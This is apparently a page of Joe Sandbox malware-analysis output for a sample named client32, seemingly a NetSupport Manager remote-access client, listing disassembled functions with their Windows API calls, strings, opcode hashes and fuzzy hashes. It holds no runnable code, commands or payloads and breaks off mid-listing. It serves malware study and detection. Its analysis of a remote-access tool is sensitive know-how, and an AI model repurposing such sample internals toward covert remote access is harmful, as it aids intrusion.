Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
API String ID: 1734919802-1728070458
Opcode ID: 3c65129bd1cd6b9dfe573abc139649b4eb696f50fb93768bc4cb37365f0de3e3
Instruction ID: 868ae3125931316a17727241cd99e9e2a94e5a6f367e843d9f8523000bf5e752
Opcode Fuzzy Hash: 3c65129bd1cd6b9dfe573abc139649b4eb696f50fb93768bc4cb37365f0de3e3
Instruction Fuzzy Hash: 65119475E01319AFC721EFEA9CC0AA6F7B8FF04319B40462FE56553541EA706540CB99

Function 1110D180 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 132threadCOMMON

Download Yara Rule

APIs

Part of subcall function 1110C4B0: _malloc.LIBCMT ref: 1110C4C9
Part of subcall function 1110C4B0: wsprintfA.USER32 ref: 1110C4E4
Part of subcall function 1110C4B0: _memset.LIBCMT ref: 1110C507

std::exception::exception.LIBCMT ref: 1110D1EA
__CxxThrowException@8.LIBCMT ref: 1110D1FF
GetCurrentThreadId.KERNEL32 ref: 1110D216
InitializeCriticalSection.KERNEL32(-00000010,?,110309CC,00000001,00000000), ref: 1110D229
InitializeCriticalSection.KERNEL32(111EB8A0,?,110309CC,00000001,00000000), ref: 1110D238
EnterCriticalSection.KERNEL32(111EB8A0,?,110309CC), ref: 1110D24C
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,110309CC), ref: 1110D272
LeaveCriticalSection.KERNEL32(111EB8A0,?,110309CC), ref: 1110D2FF

Strings

..\ctl32\Refcount.cpp, xrefs: 1110D286
QueueThreadEvent, xrefs: 1110D28B

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
API String ID: 1976012330-1024648535
Opcode ID: 69f2a39a11b822a592fdf9d3d5f92dc8d89bb020cf32c05aff7fb1e321a5611c
Instruction ID: 3950031055ca146543af7cdf1b279fa91d633e3444a8efa468e47cc8be7809bd
Opcode Fuzzy Hash: 69f2a39a11b822a592fdf9d3d5f92dc8d89bb020cf32c05aff7fb1e321a5611c
Instruction Fuzzy Hash: DD41CFB4E01215AFDB12CFA98C84FAEFBF4FB48708F54853AE419D7344E635A5008BA1

Function 11158130 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 183commemoryCOMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,33E68B52,00000000,?), ref: 11158177
CoCreateInstance.OLE32(111C069C,00000000,00000017,111C05CC,?), ref: 11158197
wsprintfW.USER32 ref: 111581B7
SysAllocString.OLEAUT32(?), ref: 111581C3
wsprintfW.USER32 ref: 11158277
SysFreeString.OLEAUT32(?), ref: 11158318

Strings

SELECT * FROM %s, xrefs: 11158271
WQL, xrefs: 11158290
root\CIMV2, xrefs: 111581B1

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
String ID: SELECT * FROM %s$WQL$root\CIMV2
API String ID: 3050498177-823534439
Opcode ID: 0398c98525be31a8c24697f93845ccd5b23503528db7bb2cb42a9ea25600af09
Instruction ID: 9336f48619520aeccc2024ab41d6a99e117e3f302117b330a271187306c5cc8d
Opcode Fuzzy Hash: 0398c98525be31a8c24697f93845ccd5b23503528db7bb2cb42a9ea25600af09
Instruction Fuzzy Hash: 51518331B00619AFC7A0CB5ACC94F9AF7B8FB8A714F1046A9E819D7650D730AE41CF51

Function 11112C20 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 182librarycomloaderCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 11112C75
CoCreateInstance.OLE32(111BBEDC,00000000,00000001,111BBEEC,00000000,?,00000000,Client,silent,00000000,00000000,?,1104B11B), ref: 11112C8F
LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11112CB4
GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11112CC6
SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11112CD9
FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11112CE5
CoUninitialize.COMBASE(00000000), ref: 11112D81

Strings

SHGetSettings, xrefs: 11112CC0
SHELL32.DLL, xrefs: 11112CA5

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
String ID: SHELL32.DLL$SHGetSettings
API String ID: 4195908086-2348320231
Opcode ID: c93f7e18291ad497f3def35e3008039eca04f2b1f5f3a3c973d42f6237fb431e
Instruction ID: 754b04c50834b9cb27866c85bafb1398d454f13d97ea83715dca47115da2e018
Opcode Fuzzy Hash: c93f7e18291ad497f3def35e3008039eca04f2b1f5f3a3c973d42f6237fb431e
Instruction Fuzzy Hash: D4516DB5A002169FDB10DFE5C9C0AEFFBB9FF88304F218569E615AB244D770A941CB61

Function 6C3D2F80 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

_calloc.LIBCMT ref: 6C3D2FBB
GetTickCount.KERNEL32 ref: 6C3D300D
InterlockedExchange.KERNEL32(?,00000000), ref: 6C3D301B
_calloc.LIBCMT ref: 6C3D303B
_memmove.LIBCMT ref: 6C3D3049
InterlockedDecrement.KERNEL32(?), ref: 6C3D307F
SetEvent.KERNEL32(00000304,?,?,?,?,?,?,?,?,?,?,?,?,?,?,93BF34B3), ref: 6C3D308C

Part of subcall function 6C3D28D0: wsprintfA.USER32 ref: 6C3D2965

Strings

a3=l, xrefs: 6C3D2F87, 6C3D2FEB, 6C3D3021, 6C3D2FEE, 6C3D3043, 6C3D305A, 6C3D3099
a3=l, xrefs: 6C3D2FE0, 6C3D2FE3

Memory Dump Source

Source File: 00000004.00000002.4575810367.000000006C3C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C3C0000, based on PE: true

Associated: 00000004.00000002.4575794801.000000006C3C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575856135.000000006C409000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575904976.000000006C410000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c3c0000_client32.jbxd

Yara matches

Similarity

API ID: Interlocked_calloc$CountDecrementEventExchangeTick_memmovewsprintf
String ID: a3=l$a3=l
API String ID: 3178096747-2949380546
Opcode ID: dafb3c8ca01422220000a88a903ee875a77b70334555d69c3e2a28562f514e0d
Instruction ID: 539a952f9ddbe27de9d6c4eabd26a3ed9f5017c2dcc942aee7d12e462623daa4
Opcode Fuzzy Hash: dafb3c8ca01422220000a88a903ee875a77b70334555d69c3e2a28562f514e0d
Instruction Fuzzy Hash: DA4196B6D40209AFDB40DFA9D844AEFB7B8AF4C304F00851AE516E7640E771AA04CFA1

Function 6C3E0D40 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(IPHLPAPI.DLL,00000000,6C3E0F2B,F54CBB65,00000000,?,?,6C3FF278,000000FF,?,6C3CAE0A,?,00000000,?,00000080), ref: 6C3E0D48
GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 6C3E0D5B
GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-6C40CB4C,?,?,6C3FF278,000000FF,?,6C3CAE0A,?,00000000,?,00000080), ref: 6C3E0D76
_malloc.LIBCMT ref: 6C3E0D8C

Part of subcall function 6C3E1B69: __FF_MSGBANNER.LIBCMT ref: 6C3E1B82
Part of subcall function 6C3E1B69: __NMSG_WRITE.LIBCMT ref: 6C3E1B89
Part of subcall function 6C3E1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6C3ED3C1,6C3E6E81,00000001,6C3E6E81,?,6C3EF447,00000018,6C407738,0000000C,6C3EF4D7), ref: 6C3E1BAE

GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,6C3FF278,000000FF,?,6C3CAE0A,?,00000000,?), ref: 6C3E0D9F
_free.LIBCMT ref: 6C3E0D84

Part of subcall function 6C3E1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 6C3E1C13
Part of subcall function 6C3E1BFD: GetLastError.KERNEL32(00000000), ref: 6C3E1C25

_free.LIBCMT ref: 6C3E0DAF

Strings

GetAdaptersAddresses, xrefs: 6C3E0D55
IPHLPAPI.DLL, xrefs: 6C3E0D41

Memory Dump Source

Source File: 00000004.00000002.4575810367.000000006C3C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C3C0000, based on PE: true

Associated: 00000004.00000002.4575794801.000000006C3C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575856135.000000006C409000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575904976.000000006C410000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c3c0000_client32.jbxd

Yara matches

Similarity

API ID: AdaptersAddressesHeap_free$AddressAllocateErrorFreeLastLibraryLoadProc_malloc
String ID: GetAdaptersAddresses$IPHLPAPI.DLL
API String ID: 1360380336-1843585929
Opcode ID: 4ebeab8224a0a72748d62dacdf832cf197bcb6cf4c5efd724cf5eec4ee45f3de
Instruction ID: 6e9c7b5d27d858b9d7b67547eed1b91f98948f3265afc77966e6bd1f21e57e78
Opcode Fuzzy Hash: 4ebeab8224a0a72748d62dacdf832cf197bcb6cf4c5efd724cf5eec4ee45f3de
Instruction Fuzzy Hash: E801D4B52403526BE6309B709C84F5776AC9B48B04F20492DF9969FA81EF72F444CF60

Function 6C3C77B0 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 107COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6C3C78B0
_free.LIBCMT ref: 6C3C78B9

Strings

ES=%d, xrefs: 6C3C783D
CMD=ENCD, xrefs: 6C3C782E
, xrefs: 6C3C77BD
e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6C3C77FB
DATA=, xrefs: 6C3C787C
body, xrefs: 6C3C7800

Memory Dump Source

Source File: 00000004.00000002.4575810367.000000006C3C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C3C0000, based on PE: true

Associated: 00000004.00000002.4575794801.000000006C3C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575856135.000000006C409000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575904976.000000006C410000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c3c0000_client32.jbxd

Yara matches

Similarity

API ID: _free
String ID: $CMD=ENCD$DATA=$ES=%d$body$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c
API String ID: 269201875-1133135390
Opcode ID: adfd5022366ddf21a6e3343eb1e2ad767c11c584eff8249aafd400aa23427e6f
Instruction ID: 050fd51cfa2d034a84db83188dda23dbf6bb214d1e89a6dde30910857c3e7cc6
Opcode Fuzzy Hash: adfd5022366ddf21a6e3343eb1e2ad767c11c584eff8249aafd400aa23427e6f
Instruction Fuzzy Hash: 1731E5767401047ED701EBA49C81EFFB3AC9F4A208F154155F894A7B41EB21FE098BA3

Function 111417E0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 111416D0: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 11141740
Part of subcall function 111416D0: RegCloseKey.ADVAPI32(?), ref: 111417A4

_memset.LIBCMT ref: 11141825
GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114183E
LoadLibraryA.KERNEL32(kernel32.dll), ref: 11141865
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11141877
FreeLibrary.KERNEL32(00000000), ref: 1114188F
GetSystemDefaultLangID.KERNEL32 ref: 1114189A

Strings

kernel32.dll, xrefs: 11141850
GetUserDefaultUILanguage, xrefs: 11141871

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
String ID: GetUserDefaultUILanguage$kernel32.dll
API String ID: 4251163631-545709139
Opcode ID: 52e08b8040a94f73e6db15951dbec387edccb6118ea88e3965d05f7f8c5290a5
Instruction ID: a1897379584a85b8fcbfce1e5dfa0143c38c02a79489d2a59ba0917f26043d4d
Opcode Fuzzy Hash: 52e08b8040a94f73e6db15951dbec387edccb6118ea88e3965d05f7f8c5290a5
Instruction Fuzzy Hash: A731D734F006278BE711DFB5C884B9AF7B4EB45728FA04175E929D3680E7346985CBA1

Function 6C3D6940 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 166COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 6C3D6950

Part of subcall function 6C3D7BE0: _memset.LIBCMT ref: 6C3D7BFF
Part of subcall function 6C3D7BE0: _strncpy.LIBCMT ref: 6C3D7C0B

Part of subcall function 6C3CA4E0: EnterCriticalSection.KERNEL32(6C40B898,00000000,?,?,?,6C3CDA7F,?,00000000), ref: 6C3CA503
Part of subcall function 6C3CA4E0: InterlockedExchange.KERNEL32(?,00000000), ref: 6C3CA568
Part of subcall function 6C3CA4E0: Sleep.KERNEL32(00000000,?,6C3CDA7F,?,00000000), ref: 6C3CA581
Part of subcall function 6C3CA4E0: LeaveCriticalSection.KERNEL32(6C40B898,00000000), ref: 6C3CA5B3

Strings

engineer, xrefs: 6C3D6AF3
Publish %d pending services, xrefs: 6C3D6AAF
1.2, xrefs: 6C3D6998
Client, xrefs: 6C3D6AE2
Channel, xrefs: 6C3D6ADD
Bl=l, xrefs: 6C3D6B88

Memory Dump Source

Source File: 00000004.00000002.4575810367.000000006C3C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C3C0000, based on PE: true

Associated: 00000004.00000002.4575794801.000000006C3C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575856135.000000006C409000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575904976.000000006C410000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c3c0000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$CountEnterExchangeInterlockedLeaveSleepTick_memset_strncpy
String ID: 1.2$Bl=l$Channel$Client$Publish %d pending services$user
API String ID: 1112461860-875570264
Opcode ID: 66dc0ebd55c4bb460d02faf71cbc1b879902fbf9f7c74eaad027c3b33a5d8fb4
Instruction ID: 37a5f52ecb81f679157fb51b8d798dab811b8fe35fb800552a6aef15d2c8e72f
Opcode Fuzzy Hash: 66dc0ebd55c4bb460d02faf71cbc1b879902fbf9f7c74eaad027c3b33a5d8fb4
Instruction Fuzzy Hash: B9518172B85245CBDB10FB79D951B9E37B4AB0630CF25092DD8A1C3A81DB32A445CFA3

Function 11015220 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 128registryCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 110152DA
_memset.LIBCMT ref: 1101531E
RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 11015358

Strings

PackedCatalogItem, xrefs: 11015342
SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 1101525B
NSLSP, xrefs: 11015368
%012d, xrefs: 110152D4

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: QueryValue_memsetwsprintf
String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
API String ID: 1333399081-1346142259
Opcode ID: 1966d73d0a7548c662ec7d0f5b9b12a1528b40116bf1a80f5935ba8defee945b
Instruction ID: bdea00c4cadcb984d55cc41d8ffa963856162fa43bf7957b15c91c952cfd9536
Opcode Fuzzy Hash: 1966d73d0a7548c662ec7d0f5b9b12a1528b40116bf1a80f5935ba8defee945b
Instruction Fuzzy Hash: 31419071D022299FEB11DB54CC80BEEF7B8EB05318F4441E8E41AA7281EB346B44CF50

Function 1100FCD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 1100FCFD
std::_Lockit::_Lockit.LIBCPMT ref: 1100FD20
std::bad_exception::bad_exception.LIBCMT ref: 1100FDA4
__CxxThrowException@8.LIBCMT ref: 1100FDB2
std::_Lockit::_Lockit.LIBCPMT ref: 1100FDC5
std::locale::facet::_Facet_Register.LIBCPMT ref: 1100FDDF

Strings

bad cast, xrefs: 1100FD9C

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: f55b3e67c510d82044a4a0eb872eff630f09d2d35040e0ac660107f250fd35c3
Instruction ID: 602abc0d8f1a48382741d83dfd398373c40b42a53a5b82a7a50980be8b5515e1
Opcode Fuzzy Hash: f55b3e67c510d82044a4a0eb872eff630f09d2d35040e0ac660107f250fd35c3
Instruction Fuzzy Hash: 51319235D006259BEB55EF94C880BAEF7B5EB05368F00426ED835A7290DB71BE05CBD2

Function 11140F70 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 146COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,11190A88), ref: 11140FDD
SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110C55B), ref: 1114101E
